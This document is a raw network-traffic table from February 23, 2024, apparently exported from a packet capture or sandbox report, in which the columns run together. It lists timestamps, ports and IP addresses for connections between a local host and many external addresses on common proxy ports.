                                                                                Feb 23, 2024 14:28:23.554174900 CET5032148915192.168.2.8138.201.21.232
                                                                                Feb 23, 2024 14:28:23.554177046 CET5020144612192.168.2.854.39.50.68
                                                                                Feb 23, 2024 14:28:23.554177046 CET5050526169192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.554188967 CET502053629192.168.2.8213.171.44.86
                                                                                Feb 23, 2024 14:28:23.554189920 CET5018612641192.168.2.8161.97.170.209
                                                                                Feb 23, 2024 14:28:23.554203987 CET5020819873192.168.2.851.210.45.148
                                                                                Feb 23, 2024 14:28:23.554205894 CET502095678192.168.2.8169.255.198.8
                                                                                Feb 23, 2024 14:28:23.554219961 CET505141585192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.554239035 CET5016930504192.168.2.892.246.139.112
                                                                                Feb 23, 2024 14:28:23.554239035 CET501805678192.168.2.8190.14.155.198
                                                                                Feb 23, 2024 14:28:23.554361105 CET509468080192.168.2.838.183.144.117
                                                                                Feb 23, 2024 14:28:23.554841042 CET265915088967.43.236.20192.168.2.8
                                                                                Feb 23, 2024 14:28:23.555016994 CET41455075768.1.210.189192.168.2.8
                                                                                Feb 23, 2024 14:28:23.555032015 CET41455075768.1.210.189192.168.2.8
                                                                                Feb 23, 2024 14:28:23.555277109 CET320655038167.43.227.227192.168.2.8
                                                                                Feb 23, 2024 14:28:23.556226015 CET1530350041184.178.172.5192.168.2.8
                                                                                Feb 23, 2024 14:28:23.556828022 CET805087950.170.90.31192.168.2.8
                                                                                Feb 23, 2024 14:28:23.556953907 CET509474145192.168.2.868.1.210.189
                                                                                Feb 23, 2024 14:28:23.556955099 CET5094850422192.168.2.845.118.132.247
                                                                                Feb 23, 2024 14:28:23.557137012 CET5004115303192.168.2.8184.178.172.5
                                                                                Feb 23, 2024 14:28:23.557488918 CET312849822132.145.61.202192.168.2.8
                                                                                Feb 23, 2024 14:28:23.557497978 CET8050820104.16.195.74192.168.2.8
                                                                                Feb 23, 2024 14:28:23.557529926 CET5004115303192.168.2.8184.178.172.5
                                                                                Feb 23, 2024 14:28:23.558351040 CET5094928106192.168.2.8148.72.177.90
                                                                                Feb 23, 2024 14:28:23.558815002 CET31285059113.37.59.99192.168.2.8
                                                                                Feb 23, 2024 14:28:23.560698986 CET5095057320192.168.2.891.134.140.160
                                                                                Feb 23, 2024 14:28:23.561234951 CET805086750.222.245.43192.168.2.8
                                                                                Feb 23, 2024 14:28:23.561885118 CET312805060182.113.157.122192.168.2.8
                                                                                Feb 23, 2024 14:28:23.561929941 CET505913128192.168.2.813.37.59.99
                                                                                Feb 23, 2024 14:28:23.562903881 CET3314050882192.81.225.9192.168.2.8
                                                                                Feb 23, 2024 14:28:23.563072920 CET5095132650192.168.2.8103.149.194.40
                                                                                Feb 23, 2024 14:28:23.564668894 CET8050726113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.564811945 CET5072680192.168.2.8113.30.149.76
                                                                                Feb 23, 2024 14:28:23.564940929 CET5072680192.168.2.8113.30.149.76
                                                                                Feb 23, 2024 14:28:23.567353010 CET509533129192.168.2.8103.78.0.44
                                                                                Feb 23, 2024 14:28:23.567481041 CET31295058620.204.190.254192.168.2.8
                                                                                Feb 23, 2024 14:28:23.568201065 CET90025072061.133.66.69192.168.2.8
                                                                                Feb 23, 2024 14:28:23.568773985 CET507209002192.168.2.861.133.66.69
                                                                                Feb 23, 2024 14:28:23.568990946 CET507209002192.168.2.861.133.66.69
                                                                                Feb 23, 2024 14:28:23.569727898 CET5018842905192.168.2.891.203.114.71
                                                                                Feb 23, 2024 14:28:23.569729090 CET5049039796192.168.2.8141.94.174.6
                                                                                Feb 23, 2024 14:28:23.569747925 CET501953128192.168.2.885.214.249.84
                                                                                Feb 23, 2024 14:28:23.569747925 CET50441999192.168.2.845.229.34.174
                                                                                Feb 23, 2024 14:28:23.569750071 CET501945306192.168.2.8171.240.108.159
                                                                                Feb 23, 2024 14:28:23.569760084 CET50197999192.168.2.8190.242.126.170
                                                                                Feb 23, 2024 14:28:23.569761038 CET502008081192.168.2.8154.239.3.185
                                                                                Feb 23, 2024 14:28:23.569768906 CET5052320003192.168.2.872.10.160.171
                                                                                Feb 23, 2024 14:28:23.569773912 CET502024153192.168.2.8189.29.143.202
                                                                                Feb 23, 2024 14:28:23.569775105 CET5021380192.168.2.8193.253.220.32
                                                                                Feb 23, 2024 14:28:23.569775105 CET5051715265192.168.2.872.10.160.90
                                                                                Feb 23, 2024 14:28:23.569777966 CET5047980192.168.2.850.168.163.181
                                                                                Feb 23, 2024 14:28:23.569777966 CET5051980192.168.2.850.217.226.40
                                                                                Feb 23, 2024 14:28:23.569775105 CET5020464312192.168.2.8104.128.103.32
                                                                                Feb 23, 2024 14:28:23.569824934 CET5021480192.168.2.835.209.198.222
                                                                                Feb 23, 2024 14:28:23.569828987 CET312805060182.113.157.122192.168.2.8
                                                                                Feb 23, 2024 14:28:23.569830894 CET5022082192.168.2.843.251.213.62
                                                                                Feb 23, 2024 14:28:23.569832087 CET5020716379192.168.2.851.15.209.188
                                                                                Feb 23, 2024 14:28:23.569850922 CET5022480192.168.2.888.51.214.182
                                                                                Feb 23, 2024 14:28:23.570961952 CET312805086982.113.157.122192.168.2.8
                                                                                Feb 23, 2024 14:28:23.571100950 CET5086931280192.168.2.882.113.157.122
                                                                                Feb 23, 2024 14:28:23.571259975 CET808050173103.118.46.176192.168.2.8
                                                                                Feb 23, 2024 14:28:23.572873116 CET805061385.12.214.148192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573007107 CET5061380192.168.2.885.12.214.148
                                                                                Feb 23, 2024 14:28:23.573051929 CET5061380192.168.2.885.12.214.148
                                                                                Feb 23, 2024 14:28:23.573057890 CET5086931280192.168.2.882.113.157.122
                                                                                Feb 23, 2024 14:28:23.573331118 CET805061385.12.214.148192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573338032 CET11505648.213.128.6192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573431969 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573487997 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573533058 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573666096 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.573775053 CET414550047184.181.217.220192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573806047 CET5095480192.168.2.885.12.214.148
                                                                                Feb 23, 2024 14:28:23.573896885 CET500474145192.168.2.8184.181.217.220
                                                                                Feb 23, 2024 14:28:23.573941946 CET80805003745.126.168.178192.168.2.8
                                                                                Feb 23, 2024 14:28:23.573976040 CET500474145192.168.2.8184.181.217.220
                                                                                Feb 23, 2024 14:28:23.574496984 CET414549941174.77.111.196192.168.2.8
                                                                                Feb 23, 2024 14:28:23.574502945 CET414549941174.77.111.196192.168.2.8
                                                                                Feb 23, 2024 14:28:23.574944973 CET509574145192.168.2.8174.77.111.196
                                                                                Feb 23, 2024 14:28:23.574975967 CET5095680192.168.2.8172.67.3.98
                                                                                Feb 23, 2024 14:28:23.575015068 CET5095530295192.168.2.8194.233.78.142
                                                                                Feb 23, 2024 14:28:23.575371981 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.575383902 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.575494051 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576011896 CET509588080192.168.2.8121.200.48.58
                                                                                Feb 23, 2024 14:28:23.576030970 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576051950 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576080084 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576112986 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576119900 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576149940 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576170921 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576179981 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576191902 CET8050726113.30.149.76192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576200008 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576208115 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576261997 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576261997 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576261997 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576278925 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576343060 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576359034 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576370955 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576385021 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.576416016 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576486111 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.576921940 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.577003002 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.577157974 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.577353001 CET808150559193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:23.577701092 CET5095980192.168.2.850.173.140.145
                                                                                Feb 23, 2024 14:28:23.578078032 CET31285007336.95.102.111192.168.2.8
                                                                                Feb 23, 2024 14:28:23.578116894 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.578152895 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.578178883 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.578206062 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.578305960 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.578455925 CET808050761115.96.208.124192.168.2.8
                                                                                Feb 23, 2024 14:28:23.578723907 CET509603128192.168.2.818.185.169.15
                                                                                Feb 23, 2024 14:28:23.578783989 CET808050756103.254.175.181192.168.2.8
                                                                                Feb 23, 2024 14:28:23.579494953 CET808049723115.96.208.124192.168.2.8
                                                                                Feb 23, 2024 14:28:23.579833031 CET5096132858192.168.2.8195.30.84.215
                                                                                Feb 23, 2024 14:28:23.580491066 CET480574982175.119.145.169192.168.2.8
                                                                                Feb 23, 2024 14:28:23.580497980 CET31285032639.105.27.30192.168.2.8
                                                                                Feb 23, 2024 14:28:23.580687046 CET5096252929192.168.2.892.204.134.38
                                                                                Feb 23, 2024 14:28:23.582088947 CET8050906172.67.181.58192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582243919 CET509639229192.168.2.8201.238.248.139
                                                                                Feb 23, 2024 14:28:23.582298040 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582307100 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582345009 CET5090680192.168.2.8172.67.181.58
                                                                                Feb 23, 2024 14:28:23.582366943 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.582374096 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582405090 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582417965 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582456112 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582463980 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582495928 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.582520008 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582529068 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582555056 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582556963 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.582578897 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582587004 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.582587957 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582587004 CET5090680192.168.2.8172.67.181.58
                                                                                Feb 23, 2024 14:28:23.582617044 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582638025 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582650900 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.582684040 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582714081 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.582782030 CET808049723115.96.208.124192.168.2.8
                                                                                Feb 23, 2024 14:28:23.582837105 CET5096480192.168.2.850.174.145.10
                                                                                Feb 23, 2024 14:28:23.583338022 CET41455087272.210.208.101192.168.2.8
                                                                                Feb 23, 2024 14:28:23.583503962 CET80805008946.209.54.102192.168.2.8
                                                                                Feb 23, 2024 14:28:23.583528042 CET508724145192.168.2.872.210.208.101
                                                                                Feb 23, 2024 14:28:23.583708048 CET508724145192.168.2.872.210.208.101
                                                                                Feb 23, 2024 14:28:23.584970951 CET509668080192.168.2.8188.132.222.34
                                                                                Feb 23, 2024 14:28:23.585032940 CET509658080192.168.2.881.94.255.13
                                                                                Feb 23, 2024 14:28:23.585354090 CET5021029631192.168.2.8145.239.2.102
                                                                                Feb 23, 2024 14:28:23.585374117 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.585374117 CET5023031554192.168.2.8147.45.40.15
                                                                                Feb 23, 2024 14:28:23.585374117 CET502311981192.168.2.841.65.236.53
                                                                                Feb 23, 2024 14:28:23.585376024 CET503963128192.168.2.879.101.37.78
                                                                                Feb 23, 2024 14:28:23.585427046 CET502333128192.168.2.8172.233.255.11
                                                                                Feb 23, 2024 14:28:23.585428953 CET5021235982192.168.2.8138.197.92.110
                                                                                Feb 23, 2024 14:28:23.585447073 CET5022280192.168.2.834.87.103.220
                                                                                Feb 23, 2024 14:28:23.585449934 CET5021744416192.168.2.8173.212.209.49
                                                                                Feb 23, 2024 14:28:23.585453033 CET5021547056192.168.2.8162.240.10.35
                                                                                Feb 23, 2024 14:28:23.585473061 CET5055414133192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.585473061 CET505074481192.168.2.850.231.0.43
                                                                                Feb 23, 2024 14:28:23.585478067 CET5022944246192.168.2.8162.214.162.156
                                                                                Feb 23, 2024 14:28:23.585506916 CET502284085192.168.2.8161.97.163.52
                                                                                Feb 23, 2024 14:28:23.585779905 CET509671337192.168.2.8124.106.116.34
                                                                                Feb 23, 2024 14:28:23.586786985 CET5096825431192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.586841106 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.586862087 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.586890936 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.586922884 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.586992979 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587001085 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587011099 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.587069035 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587124109 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.587129116 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587136984 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587162971 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587236881 CET8049886167.114.107.37192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587245941 CET74914996467.43.228.253192.168.2.8
                                                                                Feb 23, 2024 14:28:23.587275982 CET4988680192.168.2.8167.114.107.37
                                                                                Feb 23, 2024 14:28:23.587810993 CET5096980192.168.2.8162.159.242.10
                                                                                Feb 23, 2024 14:28:23.588751078 CET5097016379192.168.2.851.15.196.107
                                                                                Feb 23, 2024 14:28:23.589380980 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589390039 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589462042 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589477062 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589493990 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.589528084 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589543104 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589555025 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.589560986 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589601040 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589610100 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.589664936 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.589664936 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.589922905 CET5097132988192.168.2.8167.172.159.43
                                                                                Feb 23, 2024 14:28:23.591368914 CET50972999192.168.2.8190.61.48.24
                                                                                Feb 23, 2024 14:28:23.591790915 CET5097381192.168.2.894.153.163.226
                                                                                Feb 23, 2024 14:28:23.593696117 CET50974999192.168.2.8147.75.122.245
                                                                                Feb 23, 2024 14:28:23.593698025 CET5097536076192.168.2.8109.123.254.43
                                                                                Feb 23, 2024 14:28:23.594249964 CET5097660377192.168.2.8159.223.71.71
                                                                                Feb 23, 2024 14:28:23.594907045 CET808150559193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:23.595446110 CET5097746286192.168.2.851.222.241.157
                                                                                Feb 23, 2024 14:28:23.595546961 CET31285007336.95.102.111192.168.2.8
                                                                                Feb 23, 2024 14:28:23.595565081 CET31285007336.95.102.111192.168.2.8
                                                                                Feb 23, 2024 14:28:23.595597029 CET31285007336.95.102.111192.168.2.8
                                                                                Feb 23, 2024 14:28:23.595634937 CET31285007336.95.102.111192.168.2.8
                                                                                Feb 23, 2024 14:28:23.595642090 CET500733128192.168.2.836.95.102.111
                                                                                Feb 23, 2024 14:28:23.596307039 CET808050397103.169.130.17192.168.2.8
                                                                                Feb 23, 2024 14:28:23.596314907 CET8050599190.128.228.182192.168.2.8
                                                                                Feb 23, 2024 14:28:23.596438885 CET500733128192.168.2.836.95.102.111
                                                                                Feb 23, 2024 14:28:23.596628904 CET5097858394192.168.2.8107.148.99.92
                                                                                Feb 23, 2024 14:28:23.596667051 CET800050728222.220.102.159192.168.2.8
                                                                                Feb 23, 2024 14:28:23.596673965 CET414550449116.199.170.17192.168.2.8
                                                                                Feb 23, 2024 14:28:23.596740007 CET414550449116.199.170.17192.168.2.8
                                                                                Feb 23, 2024 14:28:23.596755028 CET507288000192.168.2.8222.220.102.159
                                                                                Feb 23, 2024 14:28:23.596760988 CET504494145192.168.2.8116.199.170.17
                                                                                Feb 23, 2024 14:28:23.596843958 CET507288000192.168.2.8222.220.102.159
                                                                                Feb 23, 2024 14:28:23.596946955 CET504494145192.168.2.8116.199.170.17
                                                                                Feb 23, 2024 14:28:23.597138882 CET509794145192.168.2.8116.199.170.17
                                                                                Feb 23, 2024 14:28:23.597800016 CET509801111192.168.2.8203.79.29.198
                                                                                Feb 23, 2024 14:28:23.598429918 CET509818080192.168.2.8195.225.142.169
                                                                                Feb 23, 2024 14:28:23.599458933 CET5098284192.168.2.843.255.113.232
                                                                                Feb 23, 2024 14:28:23.599561930 CET8050599190.128.228.182192.168.2.8
                                                                                Feb 23, 2024 14:28:23.599750042 CET8050599190.128.228.182192.168.2.8
                                                                                Feb 23, 2024 14:28:23.599988937 CET5059980192.168.2.8190.128.228.182
                                                                                Feb 23, 2024 14:28:23.600003958 CET8050599190.128.228.182192.168.2.8
                                                                                Feb 23, 2024 14:28:23.600070953 CET8050599190.128.228.182192.168.2.8
                                                                                Feb 23, 2024 14:28:23.600078106 CET8050599190.128.228.182192.168.2.8
                                                                                Feb 23, 2024 14:28:23.600152969 CET5059980192.168.2.8190.128.228.182
                                                                                Feb 23, 2024 14:28:23.600152969 CET5059980192.168.2.8190.128.228.182
                                                                                Feb 23, 2024 14:28:23.600471973 CET509838080192.168.2.8217.172.122.14
                                                                                Feb 23, 2024 14:28:23.600984097 CET5002580192.168.2.850.174.7.153
                                                                                Feb 23, 2024 14:28:23.600987911 CET49957999192.168.2.8191.97.19.66
                                                                                Feb 23, 2024 14:28:23.600989103 CET500268459192.168.2.872.10.160.171
                                                                                Feb 23, 2024 14:28:23.601005077 CET5042080192.168.2.8184.169.154.119
                                                                                Feb 23, 2024 14:28:23.601006985 CET504341088192.168.2.846.227.37.1
                                                                                Feb 23, 2024 14:28:23.601006985 CET5023811420192.168.2.838.91.106.252
                                                                                Feb 23, 2024 14:28:23.601007938 CET497513786192.168.2.8148.72.212.212
                                                                                Feb 23, 2024 14:28:23.601007938 CET502358080192.168.2.8203.192.217.6
                                                                                Feb 23, 2024 14:28:23.601015091 CET502348181192.168.2.836.91.98.115
                                                                                Feb 23, 2024 14:28:23.601123095 CET5023680192.168.2.8134.213.213.124
                                                                                Feb 23, 2024 14:28:23.601125002 CET502395678192.168.2.891.247.92.63
                                                                                Feb 23, 2024 14:28:23.602411032 CET5059980192.168.2.8190.128.228.182
                                                                                Feb 23, 2024 14:28:23.602415085 CET509844145192.168.2.8176.197.103.58
                                                                                Feb 23, 2024 14:28:23.602787018 CET808150868193.239.58.92192.168.2.8
                                                                                Feb 23, 2024 14:28:23.602902889 CET5098580192.168.2.8190.128.228.182
                                                                                Feb 23, 2024 14:28:23.603022099 CET508688081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:23.603022099 CET508688081192.168.2.8193.239.58.92
                                                                                Feb 23, 2024 14:28:23.603127956 CET5098651226192.168.2.8162.240.19.133
                                                                                Feb 23, 2024 14:28:23.603511095 CET414550831199.229.254.129192.168.2.8
                                                                                Feb 23, 2024 14:28:23.603593111 CET414550831199.229.254.129192.168.2.8
                                                                                Feb 23, 2024 14:28:23.604078054 CET50987999192.168.2.8201.71.2.41
                                                                                Feb 23, 2024 14:28:23.604681015 CET509884145192.168.2.8199.229.254.129
                                                                                Feb 23, 2024 14:28:23.605495930 CET5098980192.168.2.818.135.133.116
                                                                                Feb 23, 2024 14:28:23.606347084 CET509905678192.168.2.8117.4.242.216
                                                                                Feb 23, 2024 14:28:23.606381893 CET125295091872.10.164.178192.168.2.8
                                                                                Feb 23, 2024 14:28:23.607381105 CET509918080192.168.2.8103.114.10.250
                                                                                Feb 23, 2024 14:28:23.607547998 CET80805010345.136.197.139192.168.2.8
                                                                                Feb 23, 2024 14:28:23.608305931 CET509928123192.168.2.8161.202.226.194
                                                                                Feb 23, 2024 14:28:23.608786106 CET8050924104.22.14.48192.168.2.8
                                                                                Feb 23, 2024 14:28:23.609107971 CET5092480192.168.2.8104.22.14.48
                                                                                Feb 23, 2024 14:28:23.609272003 CET509934145192.168.2.8184.178.172.11
                                                                                Feb 23, 2024 14:28:23.609276056 CET5092480192.168.2.8104.22.14.48
                                                                                Feb 23, 2024 14:28:23.610636950 CET238595007750.63.12.33192.168.2.8
                                                                                Feb 23, 2024 14:28:23.610666990 CET5099429603192.168.2.8128.199.221.91
                                                                                Feb 23, 2024 14:28:23.610675097 CET108050407183.89.40.232192.168.2.8
                                                                                Feb 23, 2024 14:28:23.610707045 CET108050407183.89.40.232192.168.2.8
                                                                                Feb 23, 2024 14:28:23.610774994 CET5007723859192.168.2.850.63.12.33
                                                                                Feb 23, 2024 14:28:23.610853910 CET5007723859192.168.2.850.63.12.33
                                                                                Feb 23, 2024 14:28:23.611402988 CET509951080192.168.2.8183.89.40.232
                                                                                Feb 23, 2024 14:28:23.611413002 CET50996999192.168.2.838.253.88.242
                                                                                Feb 23, 2024 14:28:23.613001108 CET509988081192.168.2.8103.250.130.115
                                                                                Feb 23, 2024 14:28:23.613003969 CET5099780192.168.2.8172.67.181.37
                                                                                Feb 23, 2024 14:28:23.613055944 CET900249954221.6.139.190192.168.2.8
                                                                                Feb 23, 2024 14:28:23.613357067 CET499549002192.168.2.8221.6.139.190
                                                                                Feb 23, 2024 14:28:23.613542080 CET499549002192.168.2.8221.6.139.190
                                                                                Feb 23, 2024 14:28:23.613877058 CET509995369192.168.2.872.10.160.171
                                                                                Feb 23, 2024 14:28:23.615025043 CET510008090192.168.2.8185.32.5.130
                                                                                Feb 23, 2024 14:28:23.615722895 CET510018080192.168.2.8188.132.222.39
                                                                                Feb 23, 2024 14:28:23.616089106 CET829150733164.163.21.14192.168.2.8
                                                                                Feb 23, 2024 14:28:23.616597891 CET5070020132192.168.2.854.39.50.68
                                                                                Feb 23, 2024 14:28:23.616600990 CET505459251192.168.2.8162.214.162.180
                                                                                Feb 23, 2024 14:28:23.616616964 CET4994551167192.168.2.8207.180.236.140
                                                                                Feb 23, 2024 14:28:23.616619110 CET5048139533192.168.2.8167.172.109.12
                                                                                Feb 23, 2024 14:28:23.616626024 CET505849997192.168.2.864.225.4.85
                                                                                Feb 23, 2024 14:28:23.616626024 CET5055780192.168.2.850.173.140.148
                                                                                Feb 23, 2024 14:28:23.616628885 CET502738089192.168.2.8111.224.11.67
                                                                                Feb 23, 2024 14:28:23.616647959 CET5040180192.168.2.850.207.199.80
                                                                                Feb 23, 2024 14:28:23.617125988 CET829150733164.163.21.14192.168.2.8
                                                                                Feb 23, 2024 14:28:23.617248058 CET805092650.174.7.158192.168.2.8
                                                                                Feb 23, 2024 14:28:23.617357969 CET507338291192.168.2.8164.163.21.14
                                                                                Feb 23, 2024 14:28:23.617908001 CET510028291192.168.2.8164.163.21.14
                                                                                Feb 23, 2024 14:28:23.617912054 CET507338291192.168.2.8164.163.21.14
                                                                                Feb 23, 2024 14:28:23.618272066 CET510043128192.168.2.8104.164.183.194
                                                                                Feb 23, 2024 14:28:23.618393898 CET510038181192.168.2.8103.78.96.146
                                                                                Feb 23, 2024 14:28:23.618489981 CET128994998672.10.160.170192.168.2.8
                                                                                Feb 23, 2024 14:28:23.618941069 CET203255046572.10.164.178192.168.2.8
                                                                                Feb 23, 2024 14:28:23.619941950 CET510052685192.168.2.867.43.236.20
                                                                                Feb 23, 2024 14:28:23.621831894 CET808150736212.127.93.185192.168.2.8
                                                                                Feb 23, 2024 14:28:23.621850014 CET5100716379192.168.2.851.15.210.79
                                                                                Feb 23, 2024 14:28:23.621850014 CET5100642048192.168.2.8109.123.254.43
                                                                                Feb 23, 2024 14:28:23.622045040 CET808150736212.127.93.185192.168.2.8
                                                                                Feb 23, 2024 14:28:23.622664928 CET808050875185.38.111.1192.168.2.8
                                                                                Feb 23, 2024 14:28:23.622900963 CET510098081192.168.2.8212.127.93.185
                                                                                Feb 23, 2024 14:28:23.622901917 CET51008999192.168.2.8190.94.212.151
                                                                                Feb 23, 2024 14:28:23.623004913 CET508758080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.623213053 CET508758080192.168.2.8185.38.111.1
                                                                                Feb 23, 2024 14:28:23.623831034 CET510109812192.168.2.8181.176.221.151
                                                                                Feb 23, 2024 14:28:23.625006914 CET510111976192.168.2.841.128.89.86
                                                                                Feb 23, 2024 14:28:23.625514030 CET844350203219.243.212.118192.168.2.8
                                                                                Feb 23, 2024 14:28:23.625709057 CET8250769217.199.151.94192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626055956 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626072884 CET5101221803192.168.2.851.75.126.150
                                                                                Feb 23, 2024 14:28:23.626087904 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626132965 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626147032 CET5076982192.168.2.8217.199.151.94
                                                                                Feb 23, 2024 14:28:23.626147032 CET976450880162.243.102.207192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626148939 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626157045 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626182079 CET500484228192.168.2.85.161.219.13
                                                                                Feb 23, 2024 14:28:23.626194954 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626240969 CET4228500485.161.219.13192.168.2.8
                                                                                Feb 23, 2024 14:28:23.626246929 CET976450880162.243.102.207192.168.2.8
